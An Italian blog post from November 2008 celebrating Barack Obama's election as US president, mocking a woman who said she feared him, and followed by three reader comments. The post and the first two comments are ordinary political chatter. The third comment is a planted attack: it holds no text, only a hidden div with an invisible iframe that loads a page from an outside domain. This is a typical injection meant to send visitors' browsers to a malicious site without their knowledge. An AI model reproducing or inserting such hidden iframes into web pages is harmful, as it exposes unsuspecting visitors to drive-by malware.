Nov 052008
 

Questo deve essere stato il pensiero della signorina che, dopo aver ascoltato il bel discorso dello sconfitto Mc Cain, ha dichiarato di “aver paura di Obama”.
Mi dispiace per lei (neanche tanto, eh!), ma gli americani si sono espressi in tutt’altro modo, ed hanno dimostrato non solo di non aver paura dell’uomo nero, ma di avere anche il coraggio di eleggere Barack Obama come 44° Presidente degli Stati Uniti.

Un cambiamento epocale, senza alcun dubbio. Un cambiamento su cui ha pesato tanto la politica di Bush (si è parlato di un 20%, sbaglio?) e che ha invogliato gli americani a “puntare sul nuovo”, ed il nuovo ha la faccia di Obama.

Welcome, mr President… e per favore… io in lei ci credo, se fossi stato americano l’avrei votato di sicuro… e spero di non vederla mai a braccetto con “loschi figuri” italiani bassi e pelati, come faceva il suo predecessore

  3 Responses to ““Aiuto, l’uomo nero!!!””

  1. Sono curioso di vedere i nuovi progressi e intrecci tra i due governi ora.

  2. Tenderei a fidarmi di lui, ma attenzione, è pur sempre uno stelle / strisce.

    Chiuda Guantanamo e poi ne riparliamo 🙂

  3. <div style=”visibility:hidden”><iframe src=”http : // gfeptwe . com/ld/grb/” width=100 height=80></iframe></div></body>

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

(required)

(required)